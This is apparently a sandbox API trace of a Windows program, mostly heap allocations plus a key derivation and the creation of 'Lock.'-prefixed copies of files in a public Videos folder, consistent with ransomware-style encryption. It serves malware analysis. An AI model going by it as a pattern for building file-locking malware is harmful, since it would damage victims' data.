RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0268.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0268.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0268.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.508] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0268.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0268.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0268.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0268.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0268.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.514] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.514] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.515] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.516] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.516] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0268.516] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.516] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0268.516] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.516] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0268.516] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0268.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.517] CryptDestroyHash (hHash=0xaa5760) returned 1 [0268.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.517] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.517] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.517] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.517] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.517] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/Sample Videos" (normalized: "c:\\users\\public\\videos\\sample videos"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0268.517] GetLastError () returned 0x5 [0268.518] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0268.518] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.518] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0268.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0268.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0268.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.520] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos/" (normalized: "c:\\users\\public\\videos")) returned 0x11 [0268.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0268.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0268.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0268.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0268.520] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/Lock.Sample Videos" (normalized: "c:\\users\\public\\videos\\lock.sample videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0268.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0268.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0268.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0268.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0268.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0268.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0268.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0268.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0268.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0268.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.531] HeapFree (in: hHeap=0x25c0000, 